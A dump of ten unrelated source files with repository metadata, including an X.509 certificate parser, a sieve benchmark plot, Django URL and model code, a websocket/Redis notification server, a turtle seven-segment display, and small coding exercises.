b0e91394bff1be5dfe354c640ced42e3fac6041c | e46c52607c763675e00182c5bdd3bb61ce0c6f48 | /lib/core/cert.py | b493f50f3bce4da1b182a21e7d05e5fae694e18c | [] | no_license | atlassion/PacketSenderLite | a610833380b19c59b3ae3a7de49fbd03fffffa28 | 3ff9db1e791deedfb2d7c638f94cd9cb5daa4a63 | refs/heads/master | 2023-06-09T15:03:28.278597 | 2021-06-22T11:49:08 | 2021-06-22T11:49:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,659 | py | from hashlib import sha256, sha1, md5
from typing import List
from cryptography import x509
from cryptography.hazmat.backends import default_backend
from cryptography.x509 import Certificate
__all__ = ['convert_bytes_to_cert', 'get_certificate_domains']
# noinspection PyUnresolvedReferences,PyProtectedMember,PyBroadException
def convert_bytes_to_cert(bytes_cert: bytes) -> dict:
    """Parse a DER- or PEM-encoded X.509 certificate into a plain dict.

    Tries DER first, then PEM.  Returns None (implicitly) when the bytes
    cannot be parsed as a certificate at all - callers must handle that.
    The resulting dict contains validity, issuer, subject, version and
    serial-number fields, SAN names, and md5/sha1/sha256 fingerprints of
    the raw input bytes.
    """
    cert = None
    try:
        cert = x509.load_der_x509_certificate(bytes_cert, default_backend())
    except BaseException:
        try:
            cert = x509.load_pem_x509_certificate(bytes_cert, default_backend())
        except BaseException:
            pass
    if cert:
        result = {}
        serial_number = cert.serial_number
        issuer = cert.issuer
        try:
            # Validity window, as datetime objects and ISO-8601 style strings.
            result['validity'] = {}
            result['validity']['end_datetime'] = cert.not_valid_after
            result['validity']['start_datetime'] = cert.not_valid_before
            result['validity']['end'] = result['validity']['end_datetime'].strftime('%Y-%m-%dT%H:%M:%SZ')
            result['validity']['start'] = result['validity']['start_datetime'].strftime('%Y-%m-%dT%H:%M:%SZ')
        except Exception:
            pass
        result['issuer'] = {}
        # Map the X.509 issuer attribute names we care about onto our keys.
        dict_replace = {
            'countryName': 'country',
            'organizationName': 'organization',
            'commonName': 'common_name'
        }
        try:
            for n in issuer.rdns:
                z = n._attributes[0]
                name_k = z.oid._name
                value = z.value
                if name_k in dict_replace:
                    result['issuer'][dict_replace[name_k]] = [value]
        except Exception:
            pass
        try:
            # cert.version.name is e.g. 'v3' -> report '3'.
            if 'v' in cert.version.name:
                result['version'] = cert.version.name.split('v')[1].strip()
        except BaseException:
            result['version'] = str(cert.version.value)
        dnss = get_certificate_domains(cert)
        atr = cert.subject._attributes
        result['subject'] = {}
        for i in atr:
            for q in i._attributes:
                result['subject'][q.oid._name] = [q.value]
        if 'serialNumber' in list(result.keys()):
            # Left-pad 16-hex-digit serials before converting to int.
            if len(result['serialNumber']) == 16:
                result['serialNumber'] = '00' + result['serialNumber']
            try:
                result['serialNumber_int'] = int('0x' + result['serialNumber'], 16)
                result['serial_number'] = str(result['serialNumber_int'])
            except BaseException:
                result['serialNumber_int'] = 0
        result['names'] = dnss
        # Bug fix: 'serialNumber_int' only exists when a top-level
        # 'serialNumber' entry was set above; the old direct lookup raised
        # KeyError for every certificate without one.
        if result.get('serialNumber_int', 0) == 0:
            result['serial_number'] = str(serial_number)
        result['serial_number_hex'] = str(hex(serial_number))
        result['raw_serial'] = str(serial_number)
        # Fingerprints of the raw input bytes (not the canonical DER form).
        hashs = {
            'fingerprint_sha256': sha256,
            'fingerprint_sha1': sha1,
            'fingerprint_md5': md5
        }
        for namehash, func in hashs.items():
            hm = func()
            hm.update(bytes_cert)
            result[namehash] = hm.hexdigest()
        remove_keys = ['serialNumber_int']
        for key in remove_keys:
            # Bug fix: pop with a default - the key is absent when no
            # top-level serialNumber was found (see above).
            result.pop(key, None)
        return result
# noinspection PyBroadException
def get_certificate_domains(cert: Certificate) -> List[str]:
    """Return all DNS names from the certificate's SubjectAlternativeName.

    Returns an empty list when the certificate has no SAN extension or when
    reading the extensions fails.  (Bug fix: previously the "no SAN
    extension" case fell off the end of the function and returned None,
    violating the declared List[str] contract.)
    """
    try:
        for ext in cert.extensions:
            ext = ext.value
            if isinstance(ext, x509.SubjectAlternativeName):
                return ext.get_values_for_type(x509.DNSName)
    except BaseException:
        # Deliberately broad: any extension-parsing failure degrades to
        # "no names" rather than propagating.
        return []
    return []
| [
"shadow.bfs@gmail.com"
] | shadow.bfs@gmail.com |
7cc1e02baa1ff8a47e4b543d8df9d4f42f3110fc | 2ea2631c1c7fd49d5c177f4b804b8470bdd62a82 | /sievePlot.py | 707c12b294296830c2404c227e276f6c54faeee4 | [] | no_license | Shichimenchou/CS4700FinalProject | abf733e83ee248eff98bb8ca6bc1d0d6a8e772fa | b80480bae028c714b5c8f812e2aa587c3f1092e4 | refs/heads/master | 2022-04-23T20:29:59.202388 | 2020-04-28T05:34:10 | 2020-04-28T05:34:10 | 259,216,985 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 695 | py | from pylab import *
# Benchmark runtimes (seconds) of a Sieve of Eratosthenes for orders 2^10..2^30,
# one sample per order for each language implementation.
t = arange(10, 31)
cpp = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 1, 2, 4, 9, 20, 41, 83, 173]
julia = [0.000038, 0.000065, 0.00012, 0.00027, 0.00058, 0.0011, 0.0021, 0.0048, 0.0084, 0.018, 0.041, 0.094, 0.21, 0.61, 1.03, 2.05, 4.21, 9.77, 26.62, 76.77, 379.12]
python = [0.00025, 0.00058, 0.0010, 0.0021, 0.0046, 0.009, 0.018, 0.038, 0.076, 0.16, 0.35, 0.76, 1.58, 3.44, 6.90, 14.43, 29.38, 59.28, 121.00, 266.12, 559.05]
# Sanity check: each series should have 21 samples, matching t.
print(len(cpp))
print(len(julia))
print(len(python))
plot(t, cpp, label="C++")
plot(t, julia, label="Julia")
plot(t, python, label="Python")
legend()
xlabel("Order (2^x)")
ylabel("Time (s)")
title("Sieve of Eratosthenes")
grid(True)
# NOTE(review): legend() was already called above; this second call is redundant.
legend()
show()
| [
"linsonphillip@yahoo.com"
] | linsonphillip@yahoo.com |
54efaf34fa4aca4b31c9b4fe6d36b5dd4d65d9f7 | 14e6cf117d502517805639ee5850ec4a78654765 | /backend/bestdeal/urls.py | e0372b2dacb48c1dced46fd457e18a6f81846225 | [] | no_license | viikt0r/pythonproject | cf05590b20798bbc12985f30eabf2970d262a5d1 | e7d9f49fdf206f297641fada0a861f1e307cd4b3 | refs/heads/master | 2023-01-06T00:43:27.587484 | 2019-06-05T17:16:19 | 2019-06-05T17:16:19 | 157,125,370 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 626 | py | from os import listdir
from os.path import join, isdir
from django.urls import path, include
from pythonproject.settings import BASE_DIR
from rest_framework_swagger.views import get_swagger_view
# Swagger UI view for the whole API.
schema_view = get_swagger_view(title='Bestdeal API')
API_DIR = 'bestdeal/api/'
# Every sub-directory of bestdeal/api (except __pycache__) is treated as an
# API entity whose urls module is mounted at the site root.
entities = [directory
            for directory in listdir(join(BASE_DIR, API_DIR))
            if (isdir(join(BASE_DIR, API_DIR, directory))
                and directory != '__pycache__')]
urlpatterns = [
    path('', include('bestdeal.api.{}.urls'.format(entity)))
    for entity in entities
]
urlpatterns += [
    path('docs/', schema_view),
] | [
"esteve.viktor@gmail.com"
] | esteve.viktor@gmail.com |
31affbaa13b3b6dbe80804986e0fff5b1236c8cd | 63e903bd5448de49d666d00ae1cef76ba7e41b93 | /venv/Scripts/pip3.8-script.py | 986a0efffcb314557212eb151bb063f4e90a870c | [] | no_license | North-Poplar/untitled1 | 0958c01dfa92700876fd6a97a206cbd6c52175a2 | 06b1b025a7a2f66ce1d81a9e4ec1e164259cdb3a | refs/heads/master | 2022-11-11T18:21:33.833494 | 2020-07-04T14:55:54 | 2020-07-04T14:55:54 | 277,105,098 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 419 | py | #!C:\Users\18505\PycharmProjects\untitled1\venv\Scripts\python.exe
# EASY-INSTALL-ENTRY-SCRIPT: 'pip==19.0.3','console_scripts','pip3.8'
__requires__ = 'pip==19.0.3'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
    # Strip the setuptools wrapper suffix ("-script.py", "-script.pyw" or
    # ".exe") from argv[0] so pip reports a clean program name.
    sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
    # Delegate to the pip 19.0.3 console entry point; its return value
    # becomes the process exit code.
    sys.exit(
        load_entry_point('pip==19.0.3', 'console_scripts', 'pip3.8')()
    )
| [
"2481253805@qq.com"
] | 2481253805@qq.com |
e139bb21e3e65931f79037851b518967a20f1bdf | 6ce7ec83576e8021d050f86cd4c696a142f1798a | /final_exam/02.problem.py | 3bca39f6d99a95ed5fcbb067e335e57b32331afe | [] | no_license | Nanko-Nanev/fundamentals | 2707e20900dc779b96d453c978e8e74f1fb86fa4 | f46a655ff32bbfe6f3afeb4f3ab1fddc7a0edc89 | refs/heads/main | 2023-02-09T18:39:55.305854 | 2021-01-07T10:30:37 | 2021-01-07T10:30:37 | 326,507,304 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 470 | py | import re
# A valid message starts and ends with the same marker ($ or %) via the \1
# backreference, wraps a capitalized tag, then carries three bracketed
# numbers "[n]|[n]|[n]|" that are ASCII codes of a hidden 3-char message.
pattern = r"^(\$|%)(?P<tag>[A-Z]{1}[a-z]+)\1:\s\[(?P<t1>[0-9]+)\]\|\[(?P<t2>[0-9]+)\]\|\[(?P<t3>[0-9]+)\]\|"
n = int(input())  # number of input lines to inspect
for i in range(n):
    data = input()
    result = re.match(pattern, data)
    if result:
        obj = result.groupdict()
        tag = (obj['tag'])
        # Decode the three captured numbers as ASCII characters.
        a = chr(int(obj['t1']))
        b = chr(int(obj['t2']))
        c = chr(int(obj['t3']))
        print(f"{tag}: {a}{b}{c}")
    else:
        print(f"Valid message not found!")
"75886522+Nanko-Nanev@users.noreply.github.com"
] | 75886522+Nanko-Nanev@users.noreply.github.com |
3d07439a0606060f4f49825121ce14c2c92590b0 | e6c506beafef296be2f60c3809b36c96c7374224 | /左旋转字符串.py | 87a697603b995532a2bcc0e42f07e4a2dc49236e | [] | no_license | Liubasara/pratice_code | d435c982379e377e3cb657d77e207f4f51f5e3b5 | 353363780b0918802e9457aee8ec2a8acc0c24fb | refs/heads/master | 2023-08-18T01:29:00.676510 | 2023-08-10T11:09:11 | 2023-08-10T11:09:11 | 137,707,904 | 0 | 0 | null | 2023-01-08T07:34:21 | 2018-06-18T03:54:33 | JavaScript | UTF-8 | Python | false | false | 72 | py |
if __name__ == "__main__":
    # Left-rotate the list by one position: slice off the head element
    # and append it to the tail (Python 2 print statement).
    a = [1,2,3,4,5,6]
    print a[1:]+a[:1]
"followsin@gami.com"
] | followsin@gami.com |
a5b48a72bcda4d1aa680865c3ef883043afe3f26 | ff01890e8c6090cd7519da93a96d96a11235ec94 | /utils/flow_resolver/protocol.py | 74c97372118610e128a1103c7b503297c8b19ec5 | [
"Apache-2.0"
] | permissive | DeckerCHAN/shadowsocks | 707fbd19448919462bf9249c0e8feb557b9db1dc | 29afedb748b0ca2051def24b3bed430f522b4adf | refs/heads/master | 2021-01-15T21:30:02.355942 | 2015-05-09T05:09:49 | 2015-05-09T05:09:49 | 32,707,288 | 0 | 0 | null | 2015-03-23T02:38:19 | 2015-03-23T02:38:19 | null | UTF-8 | Python | false | false | 100 | py | __author__ = 'Decker'
class ProtocolType:
    """Constants identifying the protocol detected by the flow resolver."""
    # NOTE: the original trailing commas made TCP/UDP/HTTP one-element
    # tuples ((1,), (2,), (3,)) while UNKNOWN was a plain int, so
    # comparisons against integer values silently failed. All four are
    # now consistent integers.
    TCP = 1
    UDP = 2
    HTTP = 3
    UNKNOWN = -1  # protocol could not be determined
"DeckerCHAN@gmail.com"
] | DeckerCHAN@gmail.com |
3586db050a69dcf9aa2c251478a20d1daa1a8560 | 7eed53aaefbac57b374b31946ea2b26ff55e0e44 | /scripts/poc-7segment.py | d165774207b3d24e307b319de89e547f22bcc962 | [] | no_license | Nickardson/tracy-the-turtle-projects | 580b268a7ab3b9abc47c343a1e7cf4462ffc746b | 0545c2cd42b6a22544794b207ac2bc51475268da | refs/heads/master | 2022-12-12T07:54:19.942076 | 2020-03-06T01:01:56 | 2020-03-06T01:01:56 | 237,668,470 | 0 | 0 | null | 2022-12-11T22:53:59 | 2020-02-01T19:45:42 | Python | UTF-8 | Python | false | false | 2,182 | py | from turtle import Screen, Turtle
screen = Screen()
screen.setup(950, 200)
screen.register_shape('segment', ((-14.5, 0), (-12, 2.5), (12, 2.5), (14.5, 0), (12, -2.5), (-12, -2.5))) # <=>
SCALE = 1.75 # arbitrarily scale digits larger or smaller
CURSOR_SIZE = 25 # maximum dimension of our custom turtle cursor
SPACING = CURSOR_SIZE * 1.25 * SCALE # space from start of one digit to the next
DIGITS = { # which segments to turn on encoded as bits
'0': 0b1111110,
'1': 0b0110000,
'2': 0b1101101,
'3': 0b1111001,
'4': 0b0110011,
'5': 0b1011011,
'6': 0b1011111,
'7': 0b1110000,
'8': 0b1111111,
'9': 0b1111011,
'A': 0b1110111,
'B': 0b0011111,
'C': 0b1001110,
'D': 0b0111101,
'E': 0b1001111,
'F': 0b1000111,
}
def display_number(turtle, number):
    """Render *number* (anything str()-able) as seven-segment digits.

    For each character, look up its segment bitmask in DIGITS and stamp
    every lit segment, restoring position/heading after each stamp, then
    advance one digit width.
    """
    for glyph in str(number):
        lit_bits = DIGITS[glyph]
        for index in range(7):
            if lit_bits & (1 << index):
                origin = turtle.position()
                segments[index](turtle)  # move/orient for this segment
                turtle.stamp()
                turtle.setheading(0)
                turtle.setposition(origin)
        turtle.forward(SPACING)
def segment_A(turtle):  # top
    """Top bar: face vertical and rise one full segment height."""
    rise = 20 * SCALE
    turtle.setheading(90)
    turtle.sety(turtle.ycor() + rise)
def segment_B(turtle):  # right upper
    """Shift diagonally up-right to the upper-right segment position."""
    step = 10 * SCALE
    turtle.setposition(turtle.xcor() + step, turtle.ycor() + step)
def segment_C(turtle):  # right lower
    """Shift diagonally down-right to the lower-right segment position."""
    step = 10 * SCALE
    turtle.setposition(turtle.xcor() + step, turtle.ycor() - step)
def segment_D(turtle):  # bottom
    """Bottom bar: face vertical and drop one full segment height."""
    drop = 20 * SCALE
    turtle.setheading(90)
    turtle.sety(turtle.ycor() - drop)
def segment_E(turtle):  # left lower
    """Shift diagonally down-left to the lower-left segment position."""
    step = 10 * SCALE
    turtle.setposition(turtle.xcor() - step, turtle.ycor() - step)
def segment_F(turtle):  # left upper
    """Shift diagonally up-left to the upper-left segment position."""
    step = 10 * SCALE
    turtle.setposition(turtle.xcor() - step, turtle.ycor() + step)
def segment_G(turtle): # center
    # Center bar: the cursor is already at the digit origin, so only the
    # heading needs to change before the stamp.
    turtle.setheading(90)
# Segment handlers indexed by bit position: bit 0 = G (center) up to
# bit 6 = A (top), matching the DIGITS bit encodings above.
segments = [segment_G, segment_F, segment_E, segment_D, segment_C, segment_B, segment_A]
digits = Turtle('segment', False)
digits.speed('fastest')
digits.shape('segment')
digits.penup()
digits.setx(SPACING - screen.window_width() / 2)  # start one digit in from the left edge
display_number(digits, "0123456789ABCDEF")
| [
"taylorgratzer@yahoo.com"
] | taylorgratzer@yahoo.com |
bc74fafeb39a89942c02e53e1e406997948fc37a | d78e6d49aeb50b9a408ed0d423e96df3be7850e3 | /prototypes_v1/ui_v0/server/env/bin/flask | 2a0105ea5ea486926b7b370d5e8891df932ff422 | [] | no_license | jdunjords/birds-iview | 77e3fb0815d10fbf971c10b7b28c99a947ef628c | e8da36a46f49827eebf16b6acbb6b3967de41f4c | refs/heads/master | 2023-03-06T06:23:43.801460 | 2021-02-09T01:35:47 | 2021-02-09T01:35:47 | 295,505,143 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 265 | #!/Users/jordancolebank/Desktop/programming/capstone/server/env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from flask.cli import main
if __name__ == '__main__':
    # Strip the setuptools wrapper suffix ("-script.pyw" or ".exe") from
    # argv[0] so Flask's CLI reports a clean program name, then run it.
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"jordancolebank@Jordans-MacBook-Air-3.local"
] | jordancolebank@Jordans-MacBook-Air-3.local | |
0a6a1c337560a7be7affe868a65af85fb574f072 | 15581a76b36eab6062e71d4e5641cdfaf768b697 | /LeetCode_30days_challenge/2021/February/Peeking Iterator.py | 1c47322e8ae397e80fa7c43ca73eea44f3a2c292 | [] | no_license | MarianDanaila/Competitive-Programming | dd61298cc02ca3556ebc3394e8d635b57f58b4d2 | 3c5a662e931a5aa1934fba74b249bce65a5d75e2 | refs/heads/master | 2023-05-25T20:03:18.468713 | 2023-05-16T21:45:08 | 2023-05-16T21:45:08 | 254,296,597 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,642 | py | # Below is the interface for Iterator, which is already defined for you.
#
# class Iterator:
# def __init__(self, nums):
# """
# Initializes an iterator object to the beginning of a list.
# :type nums: List[int]
# """
#
# def hasNext(self):
# """
# Returns true if the iteration has more elements.
# :rtype: bool
# """
#
# def next(self):
# """
# Returns the next element in the iteration.
# :rtype: int
# """
class PeekingIterator:
    """Wrap an Iterator (hasNext()/next() interface) with one-element lookahead.

    The next element is always pre-fetched into ``self.buffer``; a buffer
    of None means the underlying iterator is exhausted (elements themselves
    are assumed non-None, as in the original problem statement).
    """
    def __init__(self, iterator):
        """Store the iterator and prime the lookahead buffer."""
        self.iterator = iterator
        self.buffer = self.iterator.next() if self.iterator.hasNext() else None
    def peek(self):
        """Return the next element without advancing the iterator."""
        return self.buffer
    def next(self):
        """Consume and return the next element, refilling the buffer."""
        current = self.buffer
        self.buffer = self.iterator.next() if self.iterator.hasNext() else None
        return current
    def hasNext(self):
        """Return True while at least one element remains."""
        return self.buffer is not None
# Your PeekingIterator object will be instantiated and called as such:
# iter = PeekingIterator(Iterator(nums))
# while iter.hasNext():
# val = iter.peek() # Get the next element but not advance the iterator.
# iter.next() # Should return the same value as [val].
| [
"mariandanaila01@gmail.com"
] | mariandanaila01@gmail.com |
2c535cfcb097e6b1a7f0880f3a022b2d331efe16 | b6c6d71b2c0c00540a6387ddd1e27db096d2f442 | /AIlab/certainty_facor.py | 85096f6a6ca860f1b181765f697481ee593bca29 | [] | no_license | raghavdasila/General-programs | 26bb5daddd054f8e6d56924ecb87884e687c8a53 | a9f2899ad2b048291793bbdf3dac808b571f9f13 | refs/heads/master | 2021-07-07T05:30:52.374798 | 2017-10-05T04:40:17 | 2017-10-05T04:40:17 | 104,132,884 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 636 | py | if __name__=="__main__":
print "Medicine Accuracy Testing (Enter percentages)"
print "Enter sensitivity"
se=float(raw_input())/100.0
print "Enter Specificity"
sp=float(raw_input())/100.0
print "Enter percentage of users"
up=float(raw_input())/100.0
print "Enter population"
p=float(raw_input())
pv=(se*up)/(se*up+(1.0-up)*(1.0-se))
nv=(sp*up)/(sp*up+(1.0-up)*(1.0-sp))
n_users=up*p
users=p-n_users
cf1=int(pv*p)
cf2=int(nv*p)
print "Positive's certainty factor, people:",pv,cf1
print "Negative's certainty factor, people:",nv,cf2
print "Medicine suitable for people?"
if pv<.7 or nv<.7:print "NO"
else:print "YES"
| [
"noreply@github.com"
] | raghavdasila.noreply@github.com |
12772ef7ee948e7a258e8f3156c4960d0078d2b9 | 37ca51c6c0b21b9b6efbc437bca34f433384ffee | /solution/bit_map/no_16_power.py | e7912d98fad93dc217ff4e334db2a44507a87e3a | [
"MIT"
] | permissive | LibertyDream/algorithm_data_structure | 2ea83444c55660538356901472654703c7142ab9 | 5d143d04d001a9b8aef30334881d0af56d8c9850 | refs/heads/master | 2020-05-18T00:52:59.457481 | 2019-12-31T09:21:46 | 2019-12-31T09:21:46 | 184,074,211 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,165 | py | '''面试题16:数值的整数次方
实现函数 double Power(double base,int exponent),求base的exponent次方。
不得使用库函数,同时不需要考虑大数问题
-------------
Example
input:2,3
output:8
---------------
功能、边界、负面测试,错误返回方式
'''
def power(base: float, exponent: int):
    """Raise *base* to an integer *exponent* without library functions.

    Raises:
        TypeError: when *exponent* is not an integer.
        ValueError: when *base* is (approximately) zero and *exponent*
            is negative, which would divide by zero.
    """
    if not isinstance(exponent, int):
        raise TypeError('exponent must be an integer')
    if abs(base - 0.0) < 1e-9 and exponent < 0:
        raise ValueError('base is 0, exponent cannot be negative')
    if exponent < 0:
        # Negative exponent: compute the positive power, then invert.
        return 1.0 / __unsinged_power(base, abs(exponent))
    return __unsinged_power(base, exponent)

def __unsinged_power(base, exponent):
    """Exponentiation by squaring for a non-negative integer exponent."""
    if exponent == 0:
        return 1
    if exponent == 1:
        return base
    # Recurse on exponent // 2, square the result, and multiply in one
    # extra factor of base when the exponent is odd.
    half = __unsinged_power(base, exponent >> 1)
    squared = half * half
    return squared * base if exponent & 0b1 else squared
if __name__ == "__main__":
    # Smoke tests covering positive/negative/zero exponents with integer,
    # negative and fractional bases (no error-raising inputs included).
    datas = [[2,3],[2,-1],[2,0],[-2,3],[-2,-2],[-2,0],[0,3],[0,0],[.5,2],[.5,0],[.5,-2]]
    for data in datas:
        print('power(%f,%d):%f'%(data[0],data[1],power(data[0],data[1])))
| [
"mfx660@163.com"
] | mfx660@163.com |
a50627fd3992ca3c5b4930f7a1ab9aff7f483375 | d08dc239a3eda6de61be9c128976bb6d199a6721 | /final_project/image_search/search_img/server.py | 6fd6f1183bcfe59602119754c5dd3cf19b96efdd | [] | no_license | NataKuskova/vagrant-final_project | 7ac87ec4623a4a30b9d225a58f83cf7b9f37407d | d3f624a99c3d1d65d0321f8e90070c847e7b8cd3 | refs/heads/master | 2021-01-11T00:52:58.463215 | 2016-10-10T07:09:19 | 2016-10-10T07:09:19 | 70,456,312 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,320 | py | from autobahn.asyncio.websocket import WebSocketServerProtocol, \
WebSocketServerFactory
import asyncio
import asyncio_redis
import logging
import json
FORMAT = u'%(filename)s[LINE:%(lineno)d]# %(levelname)-8s ' \
u'[%(asctime)s] %(message)s'
logging.basicConfig(format=FORMAT, level=logging.DEBUG) # filename=u'../logs.log'
class WebSocketFactory(WebSocketServerFactory):
    """
    Class for asyncio-based WebSocket server factories.

    Tracks connected clients per search-engine channel in
    ``_search_engines[site][tag]`` entries shaped as
    ``{'address': {peer: protocol_instance}, 'counter': bool}``.
    """
    _search_engines = {'google': {},
                       'yandex': {},
                       'instagram': {}
                       }
    sites = ['google',
             'yandex',
             'instagram'
             ]
    def register_client(self, tag, id_connection, instance):
        """
        Adds a client to the registry under every site.
        Args:
            tag: Key the client is registered under (the text payload the
                client sent in its WebSocket message).
            id_connection: Address of the client.
            instance: Instance of the class Server Protocol.
        """
        # First pass creates the per-tag entry if missing (counter starts
        # False); second pass adds this connection to entries that already
        # existed for the tag.
        for site in self.sites:
            self._search_engines[site].setdefault(tag, {
                'address': {id_connection: instance}, 'counter': False})
        for site in self.sites:
            self._search_engines[site][tag][
                'address'].setdefault(id_connection, instance)
    def get_tags(self, channel, tag):
        """
        Returns the registry entry for *tag* on *channel*.
        Args:
            channel: Site name ('google', 'yandex' or 'instagram').
            tag: Key the clients were registered under.
        Returns:
            The ``{'address': ..., 'counter': ...}`` dict for that tag.
        """
        return self._search_engines[channel][tag]
    def unregister_client(self, id_connection):
        """
        Removes the client from the list when a connection is closed.
        Args:
            id_connection: Address of the client.
        """
        for site in self.sites:
            for tag in self._search_engines[site]:
                if id_connection in self._search_engines[site][tag]['address']:
                    del self._search_engines[site][tag]['address'][id_connection]
            # Drop tags that no longer have any registered connections.
            self._search_engines[site] = {k: v for k, v in
                                          self._search_engines[site].items() if
                                          v['address']}
        logging.info('Connection {0} is closed.'.format(id_connection))
class ServerProtocol(WebSocketServerProtocol):
    """
    Class for asyncio-based WebSocket server protocols.
    """
    def onConnect(self, request):
        """
        Callback fired during WebSocket opening handshake when a client
        connects (to a server with request from client) or when server
        connection established (by a client with response from server).
        This method may run asynchronous code.
        Args:
            request: WebSocket connection request information.
        """
        logging.info("Client connecting: {0}".format(request.peer))
    def onOpen(self):
        """
        Callback fired when the initial WebSocket opening handshake was
        completed.
        """
        logging.info("WebSocket connection open.")
    def onMessage(self, payload, isBinary):
        """
        Callback fired when a complete WebSocket message was received.
        Registers this connection in the factory under the decoded
        payload, which acts as the tag.
        Args:
            payload: The WebSocket message received.
            isBinary: `True` if payload is binary, else the payload
            is UTF-8 encoded text.
        """
        logging.info("Message received: {0}".format(payload.decode('utf8')))
        self.factory.register_client(payload.decode('utf8'), self.peer, self)
    def onClose(self, wasClean, code, reason):
        """
        Callback fired when the WebSocket connection has been closed
        (WebSocket closing handshake has been finished or the connection
        was closed uncleanly).
        Removes the client from the list.
        Args:
            wasClean: `True` if the WebSocket connection was closed cleanly.
            code: Close status code as sent by the WebSocket peer.
            reason: Close reason as sent by the WebSocket peer.
        """
        # NOTE(review): uses the module-level `factory` (bound in the
        # __main__ block) instead of self.factory as the other callbacks
        # do -- confirm this is intentional; it breaks if the module is
        # imported without running __main__.
        factory.unregister_client(self.peer)
        logging.info("WebSocket connection closed: {0}".format(reason))
@asyncio.coroutine
def run_subscriber():
"""
Asynchronous Redis client. Start a pubsub listener.
It receives signals from the spiders and sends a message to the client.
"""
# Create connection
connection = yield from asyncio_redis.Connection.create(
host='localhost', port=6379)
# Create subscriber.
subscriber = yield from connection.start_subscribe()
# Subscribe to channel.
yield from subscriber.subscribe(['google',
'yandex',
'instagram'
])
spiders = []
# Inside a while loop, wait for incoming events.
while True:
reply = yield from subscriber.next_published()
key_dict = factory.get_tags(reply.channel, reply.value)
key_dict['counter'] = True
if factory.get_tags('google', reply.value)['counter'] \
and factory.get_tags('yandex', reply.value)['counter'] \
and factory.get_tags('instagram', reply.value)['counter']:
for client in key_dict['address'].values():
client.sendMessage('ok'.encode('utf8'), False)
"""
if reply.channel == 'google':
tags['google'].append(reply.value)
# if reply.channel == 'instagram':
# tags['instagram'].append(reply.value)
# if reply.channel == 'yandex':
# tags['yandex'].append(reply.value)
for tag, clients in factory.get_tags().items():
if tag in tags['google']:
# and tag in tags['instagram']:
# and tag in tags['yandex']:
for client in clients:
for address in client:
client[address].sendMessage('ok'.encode('utf8'), False)
tags['google'].remove(tag)
# tags['instagram'].remove(tag)
# tags['yandex'].remove(tag)
"""
"""
spiders.append(json.loads(reply.value))
if spiders:
# if clients is not None:
for spider in spiders:
tags = factory.get_client(spider['tag'])
if 'google' in spider['site'] \
and 'instagram' in spider['site']:
# and 'yandex' in spider['site']:
# print(spiders[0]['tag'])
# for tag in spider['tag']:
# print('tag')
# print(tag)
for clients in tags:
for client in clients:
clients[client].sendMessage('ok'.encode('utf8'), False)
# spiders.clear()
"""
"""
try:
if 'google' in spiders:
# and 'yandex' in spiders \
# and 'instagram' in spiders:
factory.get_client(clients).sendMessage(
'ok'.encode('utf8'), False)
spiders.clear()
# elif 'google' in spiders:
# factory.get_client(client_id).sendMessage(
# 'google'.encode('utf8'), False)
# elif 'yandex' in spiders:
# factory.get_client(client_id).sendMessage(
# 'yandex'.encode('utf8'), False)
# elif 'instagram' in spiders:
# factory.get_client(client_id).sendMessage(
# 'instagram'.encode('utf8'), False)
except:
factory.get_client(clients).sendMessage(
'error'.encode('utf8'), False)
"""
logging.info('Received: ' + repr(reply.value) + ' on channel ' +
reply.channel)
# When finished, close the connection.
connection.close()
if __name__ == '__main__':
    # Fall back to the trollius backport when asyncio is unavailable
    # (pre-3.4 interpreters).
    try:
        import asyncio
    except ImportError:
        import trollius as asyncio
    factory = WebSocketFactory(u"ws://127.0.0.1:9000")
    factory.protocol = ServerProtocol
    loop = asyncio.get_event_loop()
    coro = loop.create_server(factory, '0.0.0.0', 9000)
    web_socket_server = loop.run_until_complete(coro)
    # NOTE(review): run_subscriber() contains a `while True` with no break,
    # so run_until_complete here blocks before run_forever() is reached --
    # confirm this is the intended startup sequence.
    subscriber_server = loop.run_until_complete(run_subscriber())
    try:
        loop.run_forever()
    except KeyboardInterrupt:
        pass
    finally:
        # Best-effort shutdown of both servers and the event loop.
        web_socket_server.close()
        subscriber_server.close()
        loop.close()
| [
"natasga.kuskova@gmail.com"
] | natasga.kuskova@gmail.com |
d7ce23f53fe0a65a72e04d05fb3d4fc24bc04900 | 973e19eb630d38dc1c9aaf5662199257afc38786 | /usaspending_api/references/models/toptier_agency.py | bb9f3109a7f02e7fea17ec1cfeb604dfe382929c | [
"CC0-1.0"
] | permissive | Violet26/usaspending-api | 40e424c333c59289a2d76db4274e1637f2fcea7c | 3e2b54662bb27217f4af223d429b09c112a01a5a | refs/heads/dev | 2022-12-15T22:04:36.837754 | 2020-02-14T18:20:21 | 2020-02-14T18:20:21 | 241,180,147 | 0 | 0 | CC0-1.0 | 2022-12-08T06:22:57 | 2020-02-17T18:35:00 | null | UTF-8 | Python | false | false | 682 | py | from django.db import models
class ToptierAgency(models.Model):
    """Department-level (top-tier) agency reference record."""
    toptier_agency_id = models.AutoField(primary_key=True)
    create_date = models.DateTimeField(auto_now_add=True)  # set once on insert
    update_date = models.DateTimeField(auto_now=True)  # refreshed on every save
    # Agency code; unique and indexed for lookups.
    toptier_code = models.TextField(db_index=True, unique=True)
    abbreviation = models.TextField(blank=True, null=True)
    name = models.TextField(db_index=True)
    mission = models.TextField(blank=True, null=True)
    website = models.URLField(blank=True, null=True)
    justification = models.URLField(blank=True, null=True)
    icon_filename = models.TextField(blank=True, null=True)
    class Meta:
        db_table = "toptier_agency"
| [
"barden_kirk@bah.com"
] | barden_kirk@bah.com |
